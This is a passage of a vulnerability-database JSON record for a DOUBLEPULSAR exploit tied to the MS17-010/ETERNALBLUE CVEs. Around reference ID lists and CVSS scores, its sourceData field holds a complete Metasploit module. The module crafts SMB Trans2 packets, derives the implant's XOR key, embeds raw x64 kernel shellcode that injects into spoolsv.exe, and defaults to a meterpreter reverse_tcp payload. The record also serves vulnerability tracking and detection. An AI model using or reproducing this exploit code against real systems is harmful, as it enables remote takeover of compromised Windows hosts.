"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96705", "SMNTC-96703", "SMNTC-96707", "SMNTC-96704", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0145"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-09-02T22:14:33", "rev": 2}, "score": {"value": 7.7, "vector": "NONE", "modified": "2021-09-02T22:14:33", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33313", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'DOUBLEPULSAR Payload Execution and Neutralization',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14',\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload', {}],\r\n ['Neutralize implant', {}]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n },\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_SAFE],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack('V').first\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n vprint_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n vprint_good(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n vprint_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n vprint_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << Rex::Text.rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack(\"S<\")\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" +\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" +\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" +\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" +\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" +\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" +\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" +\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" +\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" +\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" +\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" +\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" +\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" +\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" +\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" +\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" +\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" +\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" +\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" +\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" +\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" +\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" +\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" +\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" +\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" +\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" +\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" +\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" +\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" +\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" +\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" +\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" +\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" +\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" +\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" +\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" +\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" +\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" +\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" +\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" +\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" +\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" +\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" +\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" +\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" +\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" +\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" +\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-03] #"}, "lastseen": "2021-09-02T22:14:33", "differentElements": ["sourceData"], "edition": 5}, {"bulletin": {"id": "1337DAY-ID-33313", "vendorId": null, "hash": "8c0a430cef407e0d779fcb8ffb732822", "type": "zdt", "bulletinFamily": "exploit", "title": "DOUBLEPULSAR - Payload Execution and Neutralization Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2019-10-04T00:00:00", "modified": "2019-10-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33313", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0145", "CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-03T22:12:36", "history": [], "viewCount": 93, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142603", "PACKETSTORM:146236", "PACKETSTORM:142602", "PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "nessus", "idList": ["SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-29702", "1337DAY-ID-27803"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:42030", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42031", "EDB-ID:43970"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0145", "CVE-2017-0144", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96706", "SMNTC-96703", "SMNTC-96705", "SMNTC-96704", "SMNTC-96709"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "threatpost", "idList": ["THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46", 